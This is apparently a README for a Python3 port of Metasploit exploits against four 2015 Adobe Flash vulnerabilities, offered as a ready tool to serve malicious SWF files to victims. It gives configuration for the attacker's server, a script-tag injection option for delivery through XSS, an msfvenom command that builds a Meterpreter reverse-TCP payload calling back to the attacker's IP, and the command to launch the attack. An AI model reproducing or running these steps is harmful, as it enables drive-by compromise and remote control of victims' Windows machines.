
Converted Metasploit exploits for Adobe Flash vulnerabilities CVE-2015-3090, CVE-2015-3105, CVE-2015-5119, and CVE-2015-5122 to a Python3 script.
Converted Metasploit exploits for Adobe Flash vulnerabilities CVE-2015-3090, CVE-2015-3105, CVE-2015-5119, and CVE-2015-5122 to a Python3 script.
This script will host a web server that can exploit one of the following Adobe Flash vulnerabilities at a time:
You must make changes (outlined here) to exploit.py to suit your needs.
hostname = "192.168.1.100"
serverPort = 8080
xss = FalseTrue, then the victim's first request to the server is treated as JavaScript:
<script src="http://192.168.1.100:8080/"></script>False, then the victim's first request to the server is treated as HTML:
http://192.168.1.100:8080/base64Payload = "..."
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 | base64Note: The only payload that has worked for me is
windows/meterpreter/reverse_tcp.
swfFile = swfFileList['37368']
swfFileList = {
'37368': 'CVE-2015-3090.swf',
'37448': 'CVE-2015-3105.swf',
'37523': 'CVE-2015-5119.swf',
'37599': 'CVE-2015-5122.swf'
}
Run the following command, in the same directory as the malicious swf files, to execute the Adobe Flash exploit script:
python3 exploit.pyCVE-2015-3090 -> https://exploit-db.com/exploits/37368
CVE-2015-3105 -> https://exploit-db.com/exploits/37448
CVE-2015-5119 -> https://exploit-db.com/exploits/37523
CVE-2015-5122 -> https://exploit-db.com/exploits/37599